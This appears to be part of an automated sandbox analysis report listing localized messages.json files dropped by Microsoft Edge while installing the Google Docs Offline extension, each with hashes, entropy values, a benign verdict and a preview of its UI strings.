Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
SSDEEP:	12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
MD5:	BFAEFEFF32813DF91C56B71B79EC2AF4
SHA1:	F8EDA2B632610972B581724D6B2F9782AC37377B
SHA-256:	AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
SHA-512:	971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.569671329405572
Encrypted:	false
SSDEEP:	24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
MD5:	7F5F8933D2D078618496C67526A2B066
SHA1:	B7050E3EFA4D39548577CF47CB119FA0E246B7A4
SHA-256:	4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
SHA-512:	0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	884
Entropy (8bit):	4.627108704340797
Encrypted:	false
SSDEEP:	24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
MD5:	90D8FB448CE9C0B9BA3D07FB8DE6D7EE
SHA1:	D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
SHA-256:	64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
SHA-512:	6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\sw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	980
Entropy (8bit):	4.50673686618174
Encrypted:	false
SSDEEP:	12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
MD5:	D0579209686889E079D87C23817EDDD5
SHA1:	C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
SHA-256:	0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
SHA-512:	D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
Malicious:	false
Preview:	{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ta\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1941
Entropy (8bit):	4.132139619026436
Encrypted:	false
SSDEEP:	24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
MD5:	DCC0D1725AEAEAAF1690EF8053529601
SHA1:	BB9D31859469760AC93E84B70B57909DCC02EA65
SHA-256:	6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
SHA-512:	6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\te\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1969
Entropy (8bit):	4.327258153043599
Encrypted:	false
SSDEEP:	48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
MD5:	385E65EF723F1C4018EEE6E4E56BC03F
SHA1:	0CEA195638A403FD99BAEF88A360BD746C21DF42
SHA-256:	026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
SHA-512:	E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\th\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1674
Entropy (8bit):	4.343724179386811
Encrypted:	false
SSDEEP:	48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
MD5:	64077E3D186E585A8BEA86FF415AA19D
SHA1:	73A861AC810DABB4CE63AD052E6E1834F8CA0E65
SHA-256:	D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
SHA-512:	56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\tr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	4.853399816115876
Encrypted:	false
SSDEEP:	24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
MD5:	76B59AAACC7B469792694CF3855D3F4C
SHA1:	7C04A2C1C808FA57057A4CCEEE66855251A3C231
SHA-256:	B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
SHA-512:	2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\uk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1333
Entropy (8bit):	4.686760246306605
Encrypted:	false
SSDEEP:	24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
MD5:	970963C25C2CEF16BB6F60952E103105
SHA1:	BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
SHA-256:	9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
SHA-512:	1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ur\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1263
Entropy (8bit):	4.861856182762435
Encrypted:	false
SSDEEP:	24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
MD5:	8B4DF6A9281333341C939C244DDB7648
SHA1:	382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
